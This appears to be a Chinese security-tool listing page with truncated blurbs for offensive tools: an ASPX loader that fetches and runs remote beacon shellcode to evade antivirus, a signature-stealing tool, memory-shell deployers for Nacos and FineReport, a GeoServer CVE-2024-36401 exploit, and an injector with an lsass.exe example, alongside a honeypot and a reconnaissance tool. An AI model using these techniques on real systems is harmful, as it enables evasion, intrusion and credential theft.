说明ASPX内存执行shellcode,绕过WindowsDefender（AV/EDR），这只是个代码例子，目的是为了学习部分杀软（AV/EDR）可能需要你的Bin能够做到内存免杀持续更新中，包括后续的JSP内存加载使用将shellcode远程托管到任意网站（URLB）http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin视…

一键窃取签名程序的图标、资源信息，版本信息、修改时间、数字签名（无效），使程序正规化。对抗QVM数字签名是无效的，但是可以起到模拟的作用可以生成程序的图标存根 Thief.mp4 参考https://github.com/sorabug/ChangeTimestamphttps://github.com/secretsquirrel/SigThief

使用注意：先判断漏洞和系统可能是未授权可能是后台后台就填一下accesstoken这个非必填落地jar目录必须写内存马连接问题url要形如http://127.0.0.1:8848/nacos/111一直在部署就参考一下6部署函数id问题没办法存一下吧✅(被部署太多不容易打，可参考6)本地加载✅关闭时要结束进程✅内存马太大怎么办？命令写内存jar？精简？❎换蚁剑✅判断系统人工选择路径✅擦屁股/爆菊…

geoserverCVE-2024-36401声明：仅用于授权测试，用户滥用造成的一切后果和作者无关请遵守法律法规！工具稍后放出原本没打算写的，主要是想着直接去搜一下工具，直接用着方便就OK了找到一个geoserverCVE-2024-36401漏洞利用工具GeoServer综合漏洞扫描工具V1.2发布！但是实际使用下来感觉到这个工具稍微有点Lk，作者说是go语言写的，速度极快，主要表现是两点1、…

一款从Ring0和3以及APC注入的提权注入工具。//开源无🐎,relax!!Usage:APC注入example:InjectTools.exe你要注入的程序DLL路径InjectTools.exelsass.exeC:\Users\ASUS\Desktop\artifact_x64.dllDLL注入example:InjectTools.exe你要注入的程序DLL路径InjectTools.e…

使用Surge脚本绕过候选名单，强制开启Figma测试版UI3。Figma作为一款强大的设计工具，拥有许多测试版功能供用户尝试。然而，这些功能通常只对特定用户开放。如果你想绕过候选名单并强制开启Figma的测试版UI3，可以使用Surge脚本来实现。本文将详细介绍如何使用Surge脚本完成这一操作。所需工具Surge应用：一款强大的网络调试工具，支持HTTPS拦截和修改。（自行获取）Figma-U…

针对finereportv10反序列化接口/webroot/decision/remote/design/channel进行无回显检测并提供Godzillamemshell注入功能（部分环境缺少依赖无法成功）。因为添加了两个FineReport原生的jar包文件，因此打包后的工具体积较大，经历、水平有限暂不知道怎么解决，如有建议尽管提。对工具不放心使用的可自行反编译检查。使用方式无回显命令执行：j…

中文|English欢迎来到Ehoney👋⭐️SeccomeTeamer积累十几年的安全经验，都将对外逐步开放，首开的Ehoney欺骗防御系统，该系统是基于云原生的欺骗防御系统，也是业界唯一开源的对标商业系统的产品，欺骗防御系统通过部署高交互高仿真蜜罐及流量代理转发，再结合自研密签及诱饵，将攻击者攻击引导到蜜罐中达到扰乱引导以及延迟攻击的效果，可以很大程度上保护业务的安全。护网必备良药，该平台只提…

注：最新版v4.0版本为QTC++重构不再开源，由于C++编写iconhash无法和官方iconhash对应采用python写的预编译在工具中会在temp创建临时文件iconhash.exe因此可能会出现杀软误报问题！v4.1对fofa及功能做了很多优化及改变，支持多窗口展示，支持排序，所有平台支持自定义域名v3.0以下版本支持的平台基于pythonpyside2库实现的，支持windowsmac…

免责声明本工具仅面向合法授权的企业安全建设行为与个人学习行为，如您需要测试本工具的可用性，请自行搭建靶机环境。在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。请勿对非授权目标进行扫描。如果发现上述禁止行为，我们将保留追究您法律责任的权利。如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。在安装并使用本工具前，请您务必…